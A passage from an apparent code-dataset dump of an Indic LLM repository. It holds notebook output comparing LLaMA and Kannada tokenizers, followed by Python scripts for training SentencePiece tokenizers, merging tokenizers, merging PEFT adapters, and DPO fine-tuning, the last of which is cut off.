'<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', 'ರ', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAD>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x8A>', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAD>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '<0x0A>']\n",
"LLaMA tokenizer n_tokens=2789\n",
"Tokenized by kannada-LLaMA tokenizer:['<0x0A>', 'ರಸ', '್ತು', 'ತ', '▁ದಿನಗಳಲ್ಲಿ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ಫೋನ್', '\\u200c', 'ಗಳು', '▁ಮಾತ್ರವಲ್ಲ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳು', '▁ಕೂಡ', '▁ಸಿಕ್ಕ', 'ಾಪ', 'ಟ್ಟೆ', '▁ಸೌಂಡ್', '\\u200c', '▁ಮಾಡುತ್ತಿವೆ', '.', '▁ಫಿಟ್', 'ನೆ', 'ಸ್', '\\u200c', '▁ಆಧಾರಿತ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ಟೆಕ್', '\\u200c', '▁ವಲಯದಲ್ಲಿ', '▁ಭಾರಿ', '▁ಬೇಡಿಕೆ', '▁ಇದೆ', '.', '▁ಇದೇ', '▁ಕಾರಣಕ್ಕೆ', '▁ಹಲವು', '▁ಕಂಪ', 'ೆ', 'ನಿ', 'ಗಳು', '▁ವೈ', 'ವಿಧ', '್ಯ', 'ಮಯ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳನ್ನು', '▁ಪರಿ', 'ಚ', 'ಯಿ', 'ಸಿ', 'ವೆ', '.', '▁ಇವುಗಳಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಕೂಡ', '▁ಬ', 'ಳ', 'ಕೆ', 'ದಾರರ', '▁ನೆ', 'ಚ್ಚಿ', 'ನ', '▁ಬ್ರಾಂಡ್', '\\u200c', '▁ಎ', 'ನಿ', 'ಸಿ', 'ಕೊಂಡಿದೆ', '.', '▁ಸದ್ಯ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ತನ್ನ', '▁ವಿ', 'ಭಿ', 'ನ್ನ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಿಂದ', '▁ಗುರು', 'ತಿ', 'ಸಿ', 'ಕೊಂಡಿದೆ', '.', '▁ಇ', 'ದೀ', 'ಗ', '▁ತನ್ನ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳ', '▁ಮೇಲೆ', '▁ಭರ', '್', 'ಜ', 'ರಿ', '▁ಡಿಸ್', 'ಕೌ', 'ಂಟ್', '\\u200c', '▁ಅನ್ನು', '▁ನೀಡುತ್ತಿದೆ', '.', '<0x0A>', 'ಹೌದು', ',', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಕಂಪ', 'ೆ', 'ನಿ', '▁ತನ್ನ', '▁ಕೆಲವು', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳ', '▁ಮೇಲೆ', '▁ಬಿಗ್', '\\u200c', '▁ಡಿಸ್', 'ಕೌ', 'ಂಟ್', '\\u200c', '▁ನೀಡುತ್ತಿದೆ', '.', '▁ನೀವು', '▁ಕೂಡ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳನ್ನು', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದರದಲ್ಲಿ', '▁ಖ', 'ರೀ', 'ದಿ', 'ಸಲು', '▁ಬ', 'ಯ', 'ಸಿ', 'ದರ', 'ೆ', '▁ಇದು', '▁ಉತ್', 'ತ', 'ಮ', '▁ಸಮಯ', 'ವಾಗಿದೆ', '.', '▁ಅದರಲ್ಲೂ', '▁ಜನಪ್ರಿಯ', '▁ಸ್', 'ಮಾರ್', 'ಟ್', '\\u200c', 'ವಾ', 'ಚ್', '\\u200c', 'ಗಳಾದ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಜಿಟಿ', 'ಎಸ್', '▁2', '▁ಮಿನಿ', ',', '▁ಬಿ', 'ಪ್', '▁ಯು', '▁ಪ್ರೊ', '▁ಮತ್ತು', '▁ಬಿ', 'ಪ್', '\\u200c', 'ಯು', '▁ವಾಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ಘ', 'ೋ', 'ಷಿ', 'ಸಿ', 'ದೆ', '.', '▁ಹಾಗಾದ್ರೆ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '\\u200c', '▁ವಾಚ್', '\\u200c', 'ಗಳಿಗೆ', '▁ಯಾವ', 'ೆಲ್ಲಾ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದೊರೆಯ', 'ುತ್ತಿದೆ', '▁ಅನ್ನ', 'ೊ', 'ದ', 'ನ್ನ', '▁ಈ', '▁ಲೇ', 'ಖ', 'ನ', 'ದಲ್ಲಿ', '▁ತಿಳಿಸಿಕೊಡ', '್ತೀವಿ', '▁ಓದಿ', 'ರಿ', '.', '<0x0A>', 'ಆ', 'ನ್', '\\u200c', 'ಲೈನ್', '\\u200c', '▁ಶಾಪಿಂಗ್', '\\u200c', '▁ದ', 'ೈ', 'ತ್ಯ', '▁ಅಮ', 'ೆ', 'ಜಾನ್', '\\u200c', '▁ಸೈಟ್', '\\u200c', 'ನಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಬ್ರಾಂಡ್', '▁ಡೇ', '▁ಸೇಲ್', '▁ಲೈವ್', '\\u200c', '▁ಆಗಿದೆ', '.', '▁ಅಲ್ಲದೆ', '▁ಅಮ', 'ಾ', 'ಜ್', '▁ಫಿಟ್', '▁ನ', '▁ಅಧಿಕ', 'ೃ', 'ತ', '▁ವೆಬ್', '▁ಸೈಟ್', '▁ನಲ್ಲಿ', '▁ಕೂಡ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ಸೇಲ್', '\\u200c', '▁ಲೈವ್', '▁ಆಗಿದೆ', '.', '▁ಈ', '▁ಸೇಲ್', '\\u200c', '▁ಇದೇ', '▁ಸೆ', 'ಪ್', 'ಟೆ', 'ಂಬರ್', '▁12', '▁ರವರೆಗೆ', '▁ನಡೆಯಲಿದೆ', '.', '▁ಇದರಲ್ಲಿ', '▁ಅಮ', 'ಾ', 'ಜ್', '\\u200c', 'ಫಿ', 'ಟ್', '▁ಜಿಟಿ', 'ಎಸ್', '▁2', '▁ಮಿನಿ', '▁ಅಮ', 'ೆ', 'ಜಾನ್', '\\u200c', 'ನಲ್ಲಿ', '▁ಮಾತ್ರ', '▁ಲಭ್ಯವಿದೆ', '.', '▁ಆದರೆ', '▁ಬಿ', 'ಪ್', '\\u200c', '▁ಯು', '▁ಮತ್ತು', '▁ಬಿ', 'ಪ್', '\\u200c', '▁ಯು', '▁ಪ್ರೊ', '▁ಫ್ಲ', 'ಿ', 'ಪ್', '\\u200c', 'ಕಾರ್', 'ಟ್', '\\u200c', 'ನಲ್ಲಿ', '▁ರಿಯಾ', 'ಯಿ', 'ತಿ', '▁ದರದಲ್ಲಿ', '▁ಲಭ್ಯವಾಗಲಿದೆ', '.', '<0x0A>']\n",
"kannada LLaMA tokenizer n_tokens=398\n"
]
}
],
"source": [
"llama_tokenized = fast_llama_tokenizer.tokenize(text)\n",
"kannada_llama_tokenized = kannada_llama_tokenizer_hf.tokenize(text)\n",
"print(f\"Tokenized by LLaMA tokenizer:{llama_tokenized}\")\n",
"print(f\"LLaMA tokenizer n_tokens={len(llama_tokenized)}\")\n",
"print(f\"Tokenized by kannada-LLaMA tokenizer:{kannada_llama_tokenized}\")\n",
"print(f\"kannada LLaMA tokenizer n_tokens={len(kannada_llama_tokenized)}\")"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"from datasets import load_dataset\n",
"\n",
"dataset = load_dataset.load(\"CognitiveLab/Project_K_TrainDataset_Small\")\n",
"dataset"
]
}
],
"metadata": {
"kernelspec": {
"display_name": "training-venv",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.9.18"
}
},
"nbformat": 4,
"nbformat_minor": 2
}
| 80,136 | Python | .py | 292 | 235.547945 | 26,239 | 0.398861 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,512 | train.py | adithya-s-k_Indic-llm/archives/tokenisation/train.py | import argparse
import os
import time
import sentencepiece as spm
class SentencePieceTrainer:
def __init__(self):
self.corpus_dir = "./corpus"
self.output_dir = "./tokenizer_models"
self.model_prefix = "trained_sp_tokenizer"
self.vocab_size = 20000
self.character_coverage = 1.0
self.model_type = "unigram"
def train_sentencepiece_model(self, input_file):
start_time = time.time()
output_model_path = os.path.join(self.output_dir, f"{self.model_prefix}.model")
spm.SentencePieceTrainer.train(
input=input_file,
model_prefix=self.model_prefix,
vocab_size=self.vocab_size,
character_coverage=self.character_coverage,
model_type=self.model_type,
train_extremely_large_corpus=True
)
os.rename(
f"{self.model_prefix}.vocab",
os.path.join(self.output_dir, f"{self.model_prefix}.vocab"),
)
os.rename(
f"{self.model_prefix}.model",
os.path.join(self.output_dir, f"{self.model_prefix}.model"),
)
end_time = time.time()
total_time_seconds = end_time - start_time
total_time_minutes = total_time_seconds / 60.0
print(f"Total time taken to train the model: {total_time_minutes:.2f} minutes")
return output_model_path
def run(self):
parser = argparse.ArgumentParser(description="Train a SentencePiece model.")
parser.add_argument(
"--input-file",
required=True,
help="Path to the input text corpus file.",
)
parser.add_argument(
"--output-dir",
default=self.output_dir,
help="Directory where the trained model and vocabulary will be saved.",
)
parser.add_argument(
"--model-prefix",
default=self.model_prefix,
help="Prefix for the model and vocabulary filenames.",
)
parser.add_argument(
"--vocab-size",
type=int,
default=self.vocab_size,
help="Size of the vocabulary.",
)
parser.add_argument(
"--character-coverage",
type=float,
default=self.character_coverage,
help="Character coverage for the model.",
)
parser.add_argument(
"--model-type",
default=self.model_type,
choices=["bpe", "unigram", "char", "word"],
help="Type of SentencePiece model.",
)
args = parser.parse_args()
self.output_dir = args.output_dir
self.model_prefix = args.model_prefix
self.vocab_size = args.vocab_size
self.character_coverage = args.character_coverage
self.model_type = args.model_type
os.makedirs(self.output_dir, exist_ok=True)
self.train_sentencepiece_model(args.input_file)
if __name__ == "__main__":
sp_trainer = SentencePieceTrainer()
sp_trainer.run()
| 3,073 | Python | .py | 82 | 27.390244 | 87 | 0.590602 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,513 | merge_tokenizer.py | adithya-s-k_Indic-llm/archives/tokenisation/merge_tokenizer.py | # Based on https://github.com/ymcui/Chinese-LLaMA-Alpaca/blob/main/scripts/merge_tokenizer/merge_tokenizers.py
import os
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"] = "python"
import argparse
import sentencepiece as spm
from sentencepiece import sentencepiece_model_pb2 as sp_pb2_model
from transformers import LlamaTokenizer
parser = argparse.ArgumentParser()
parser.add_argument("--llama_tokenizer_dir", default=None, type=str, required=True)
parser.add_argument("--kannada_sp_model_file", default="./kannada_sp.model", type=str)
args = parser.parse_args()
llama_tokenizer_dir = args.llama_tokenizer_dir
kannada_sp_model_file = args.kannada_sp_model_file
# load
llama_tokenizer = LlamaTokenizer.from_pretrained(llama_tokenizer_dir)
kannada_sp_model = spm.SentencePieceProcessor()
kannada_sp_model.Load(kannada_sp_model_file)
llama_spm = sp_pb2_model.ModelProto()
llama_spm.ParseFromString(llama_tokenizer.sp_model.serialized_model_proto())
kannada_spm = sp_pb2_model.ModelProto()
kannada_spm.ParseFromString(kannada_sp_model.serialized_model_proto())
# print number of tokens
print(len(llama_tokenizer), len(kannada_sp_model))
print(llama_tokenizer.all_special_tokens)
print(llama_tokenizer.all_special_ids)
print(llama_tokenizer.special_tokens_map)
## Add kannada tokens to LLaMA tokenizer
llama_spm_tokens_set = set(p.piece for p in llama_spm.pieces)
print(len(llama_spm_tokens_set))
print(f"Before:{len(llama_spm_tokens_set)}")
for p in kannada_spm.pieces:
piece = p.piece
if piece not in llama_spm_tokens_set:
new_p = sp_pb2_model.ModelProto().SentencePiece()
new_p.piece = piece
new_p.score = 0
llama_spm.pieces.append(new_p)
print(f"New model pieces: {len(llama_spm.pieces)}")
## Save
output_sp_dir = "merged_tokenizer_sp"
output_hf_dir = "merged_tokenizer_hf" # the path to save kannada-LLaMA tokenizer
os.makedirs(output_sp_dir, exist_ok=True)
with open(output_sp_dir + "/kannada_llama.model", "wb") as f:
f.write(llama_spm.SerializeToString())
tokenizer = LlamaTokenizer(vocab_file=output_sp_dir + "/kannada_llama.model")
tokenizer.save_pretrained(output_hf_dir)
print(f"kannada-LLaMA tokenizer has been saved to {output_hf_dir}")
# Test
llama_tokenizer = LlamaTokenizer.from_pretrained(llama_tokenizer_dir)
kannada_llama_tokenizer = LlamaTokenizer.from_pretrained(output_hf_dir)
print(tokenizer.all_special_tokens)
print(tokenizer.all_special_ids)
print(tokenizer.special_tokens_map)
text = """
ರಸ್ತುತ ದಿನಗಳಲ್ಲಿ ಸ್ಮಾರ್ಟ್ಫೋನ್ಗಳು ಮಾತ್ರವಲ್ಲ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳು ಕೂಡ ಸಿಕ್ಕಾಪಟ್ಟೆ ಸೌಂಡ್ ಮಾಡುತ್ತಿವೆ. ಫಿಟ್ನೆಸ್ ಆಧಾರಿತ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಗೆ ಟೆಕ್ ವಲಯದಲ್ಲಿ ಭಾರಿ ಬೇಡಿಕೆ ಇದೆ. ಇದೇ ಕಾರಣಕ್ಕೆ ಹಲವು ಕಂಪೆನಿಗಳು ವೈವಿಧ್ಯಮಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ಪರಿಚಯಿಸಿವೆ. ಇವುಗಳಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಕೂಡ ಬಳಕೆದಾರರ ನೆಚ್ಚಿನ ಬ್ರಾಂಡ್ ಎನಿಸಿಕೊಂಡಿದೆ. ಸದ್ಯ ಅಮಾಜ್ಫಿಟ್ ತನ್ನ ವಿಭಿನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಂದ ಗುರುತಿಸಿಕೊಂಡಿದೆ. ಇದೀಗ ತನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಭರ್ಜರಿ ಡಿಸ್ಕೌಂಟ್ ಅನ್ನು ನೀಡುತ್ತಿದೆ.
ಹೌದು, ಅಮಾಜ್ಫಿಟ್ ಕಂಪೆನಿ ತನ್ನ ಕೆಲವು ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಬಿಗ್ ಡಿಸ್ಕೌಂಟ್ ನೀಡುತ್ತಿದೆ. ನೀವು ಕೂಡ ಅಮಾಜ್ಫಿಟ್ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಖರೀದಿಸಲು ಬಯಸಿದರೆ ಇದು ಉತ್ತಮ ಸಮಯವಾಗಿದೆ. ಅದರಲ್ಲೂ ಜನಪ್ರಿಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಾದ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ, ಬಿಪ್ ಯು ಪ್ರೊ ಮತ್ತು ಬಿಪ್ಯು ವಾಚ್ಗಳಿಗೆ ರಿಯಾಯಿತಿ ಘೋಷಿಸಿದೆ. ಹಾಗಾದ್ರೆ ಅಮಾಜ್ಫಿಟ್ ವಾಚ್ಗಳಿಗೆ ಯಾವೆಲ್ಲಾ ರಿಯಾಯಿತಿ ದೊರೆಯುತ್ತಿದೆ ಅನ್ನೊದನ್ನ ಈ ಲೇಖನದಲ್ಲಿ ತಿಳಿಸಿಕೊಡ್ತೀವಿ ಓದಿರಿ.
ಆನ್ಲೈನ್ ಶಾಪಿಂಗ್ ದೈತ್ಯ ಅಮೆಜಾನ್ ಸೈಟ್ನಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಬ್ರಾಂಡ್ ಡೇ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಅಲ್ಲದೆ ಅಮಾಜ್ ಫಿಟ್ ನ ಅಧಿಕೃತ ವೆಬ್ ಸೈಟ್ ನಲ್ಲಿ ಕೂಡ ರಿಯಾಯಿತಿ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಈ ಸೇಲ್ ಇದೇ ಸೆಪ್ಟೆಂಬರ್ 12 ರವರೆಗೆ ನಡೆಯಲಿದೆ. ಇದರಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ ಅಮೆಜಾನ್ನಲ್ಲಿ ಮಾತ್ರ ಲಭ್ಯವಿದೆ. ಆದರೆ ಬಿಪ್ ಯು ಮತ್ತು ಬಿಪ್ ಯು ಪ್ರೊ ಫ್ಲಿಪ್ಕಾರ್ಟ್ನಲ್ಲಿ ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಲಭ್ಯವಾಗಲಿದೆ.
"""
print("Test text:\n", text)
llama_tokenized = llama_tokenizer.tokenize(text)
kannada_llama_tokenized = kannada_llama_tokenizer.tokenize(text)
print(f"Tokenized by LLaMA tokenizer:{llama_tokenized}")
print(f"LLaMA tokenizer n_tokens={len(llama_tokenized)}")
print(f"Tokenized by kannada-LLaMA tokenizer:{kannada_llama_tokenized}")
print(f"kannada LLaMA tokenizer n_tokens={len(kannada_llama_tokenized)}")
| 6,152 | Python | .py | 65 | 60.907692 | 438 | 0.691731 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,514 | merge_adapter.py | adithya-s-k_Indic-llm/archives/dpo/merge_adapter.py | from dataclasses import dataclass, field
from typing import Optional
import torch
from peft import PeftConfig, PeftModel
from transformers import AutoModelForCausalLM, AutoModelForSequenceClassification, AutoTokenizer, HfArgumentParser, LlamaForCausalLM, LlamaTokenizer
@dataclass
class ScriptArguments:
"""
The input names representing the Adapter and Base model fine-tuned with PEFT, and the output name representing the
merged model.
"""
adapter_model_name: Optional[str] = field(default=None, metadata={"help": "the adapter name"})
base_model_name: Optional[str] = field(default=None, metadata={"help": "the base model name"})
base_tokenizer_name: Optional[str] = field(default=None, metadata={"help": "the tokeniser model name"})
output_name: Optional[str] = field(default=None, metadata={"help": "the merged model name"})
parser = HfArgumentParser(ScriptArguments)
script_args = parser.parse_args_into_dataclasses()[0]
assert script_args.adapter_model_name is not None, "please provide the name of the Adapter you would like to merge"
assert script_args.base_model_name is not None, "please provide the name of the Base model"
assert script_args.base_tokenizer_name is not None, "please provide the name of the tokenizer model"
assert script_args.output_name is not None, "please provide the output name of the merged model"
peft_config = PeftConfig.from_pretrained(script_args.adapter_model_name)
# if peft_config.task_type == "SEQ_CLS":
# # The sequence classification task is used for the reward model in PPO
# model = AutoModelForSequenceClassification.from_pretrained(
# script_args.base_model_name, num_labels=1, torch_dtype=torch.bfloat16
# )
# else:
model = LlamaForCausalLM.from_pretrained(
script_args.base_model_name, return_dict=True, torch_dtype=torch.bfloat16
)
tokenizer = LlamaTokenizer.from_pretrained(script_args.base_model_name)
print("Loading PEFT")
# Load the PEFT model
model = PeftModel.from_pretrained(model, script_args.adapter_model_name)
model.eval()
print("Started Merging")
model = model.merge_and_unload()
print("Saving the Model")
model.save_pretrained(f"{script_args.output_name}")
tokenizer.save_pretrained(f"{script_args.output_name}")
print("Saving complete complete")
# model.push_to_hub(f"{script_args.output_name}", use_temp_dir=False) | 2,346 | Python | .py | 43 | 52.488372 | 148 | 0.779765 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,515 | dpo.py | adithya-s-k_Indic-llm/archives/dpo/dpo.py | # 0. imports
import os
from dataclasses import dataclass, field
from typing import Dict, Optional
import torch
from datasets import Dataset, load_dataset
from peft import LoraConfig
from transformers import AutoModelForCausalLM, AutoTokenizer, HfArgumentParser, TrainingArguments, LlamaTokenizer ,LlamaForCausalLM
from trl import DPOTrainer
# Define and parse arguments.
@dataclass
class ScriptArguments:
"""
The arguments for the DPO training script.
"""
# data parameters
beta: Optional[float] = field(default=0.1, metadata={"help": "the beta parameter for DPO loss"})
# training parameters
model_name_or_path: Optional[str] = field(
default="../sft/results/final_checkpoint",
metadata={"help": "the location of the SFT model name or path"},
)
tokenizer_name_or_path : Optional[str] = field(
default="Cognitive-Lab/Ambari-7B-Instruct-v0.1",
metadata={"help": "the name of the tokenizer"},
)
learning_rate: Optional[float] = field(default=5e-4, metadata={"help": "optimizer learning rate"})
lr_scheduler_type: Optional[str] = field(default="cosine", metadata={"help": "the lr scheduler type"})
warmup_steps: Optional[int] = field(default=100, metadata={"help": "the number of warmup steps"})
weight_decay: Optional[float] = field(default=0.05, metadata={"help": "the weight decay"})
optimizer_type: Optional[str] = field(default="paged_adamw_32bit", metadata={"help": "the optimizer type"})
per_device_train_batch_size: Optional[int] = field(default=4, metadata={"help": "train batch size per device"})
per_device_eval_batch_size: Optional[int] = field(default=1, metadata={"help": "eval batch size per device"})
gradient_accumulation_steps: Optional[int] = field(
default=4, metadata={"help": "the number of gradient accumulation steps"}
)
gradient_checkpointing: Optional[bool] = field(
default=True, metadata={"help": "whether to use gradient checkpointing"}
)
lora_alpha: Optional[float] = field(default=16, metadata={"help": "the lora alpha parameter"})
lora_dropout: Optional[float] = field(default=0.05, metadata={"help": "the lora dropout parameter"})
lora_r: Optional[int] = field(default=8, metadata={"help": "the lora r parameter"})
max_prompt_length: Optional[int] = field(default=512, metadata={"help": "the maximum prompt length"})
max_length: Optional[int] = field(default=1024, metadata={"help": "the maximum sequence length"})
num_train_epochs : Optional[int] = field(default=1, metadata={"help": "max number of epochs to train"})
max_steps: Optional[int] = field(default=1000, metadata={"help": "max number of training steps"})
logging_steps: Optional[int] = field(default=1000, metadata={"help": "the logging frequency"})
save_steps: Optional[int] = field(default=1000, metadata={"help": "the saving frequency"})
eval_steps: Optional[int] = field(default=1000, metadata={"help": "the evaluation frequency"})
output_dir: Optional[str] = field(default="./results", metadata={"help": "the output directory"})
log_freq: Optional[int] = field(default=1, metadata={"help": "the logging frequency"})
# instrumentation
sanity_check: Optional[bool] = field(default=False, metadata={"help": "only train on 1000 samples"})
report_to: Optional[str] = field(
default="wandb",
metadata={
"help": 'The list of integrations to report the results and logs to. Supported platforms are `"azure_ml"`,'
'`"comet_ml"`, `"mlflow"`, `"neptune"`, `"tensorboard"`,`"clearml"` and `"wandb"`. '
'Use `"all"` to report to all integrations installed, `"none"` for no integrations.'
},
)
# debug argument for distributed training
ignore_bias_buffers: Optional[bool] = field(
default=False,
metadata={
"help": "fix for DDP issues with LM bias/mask buffers - invalid scalar type,`inplace operation. See"
"https://github.com/huggingface/transformers/issues/22482#issuecomment-1595790992"
},
)
# def get_stack_exchange_paired(
# data_dir: str = "data/rl",
# sanity_check: bool = False,
# cache_dir: str = None,
# num_proc=24,
# ) -> Dataset:
# """Load the stack-exchange-paired dataset from Hugging Face and convert it to the necessary format.
# The dataset is converted to a dictionary with the following structure:
# {
# 'prompt': List[str],
# 'chosen': List[str],
# 'rejected': List[str],
# }
# Prompts are structured as follows:
# "Question: " + <prompt> + "\n\nAnswer: "
# """
# dataset = load_dataset(
# "lvwerra/stack-exchange-paired",
# split="train",
# cache_dir=cache_dir,
# data_dir=data_dir,
# )
# original_columns = dataset.column_names
# if sanity_check:
# dataset = dataset.select(range(min(len(dataset), 1000)))
# def return_prompt_and_responses(samples) -> Dict[str, str]:
# return {
# "prompt": ["Question: " + question + "\n\nAnswer: " for question in samples["question"]],
# "chosen": samples["response_j"],
# "rejected": samples["response_k"],
# }
# return dataset.map(
# return_prompt_and_responses,
# batched=True,
# num_proc=num_proc,
# remove_columns=original_columns,
# )
if __name__ == "__main__":
parser = HfArgumentParser(ScriptArguments)
script_args = parser.parse_args_into_dataclasses()[0]
# 1. load a pretrained model
model = LlamaForCausalLM.from_pretrained(
script_args.model_name_or_path,
torch_dtype=torch.float16,
# low_cpu_mem_usage=True,
# load_in_4bit=True,
)
model.config.use_cache = False
if script_args.ignore_bias_buffers:
# torch distributed hack
model._ddp_params_and_buffers_to_ignore = [
name for name, buffer in model.named_buffers() if buffer.dtype == torch.bool
]
model_ref = LlamaForCausalLM.from_pretrained(
script_args.model_name_or_path,
torch_dtype=torch.float16,
# low_cpu_mem_usage=True,
# load_in_4bit=True,
)
tokenizer = LlamaTokenizer.from_pretrained(script_args.tokenizer_name_or_path)
tokenizer.pad_token = tokenizer.eos_token
dataset = load_dataset("CognitiveLab/hh-rlhf-formatted-60000",split="train").train_test_split(test_size=0.2)
train_dataset = dataset["train"]
eval_dataset = dataset["test"]
# 2. Load the Stack-exchange paired dataset
# train_dataset = get_stack_exchange_paired(data_dir="data/rl", sanity_check=script_args.sanity_check)
# train_dataset = train_dataset.filter(
# lambda x: len(x["prompt"]) + len(x["chosen"]) <= script_args.max_length
# and len(x["prompt"]) + len(x["rejected"]) <= script_args.max_length
# )
# 3. Load evaluation dataset
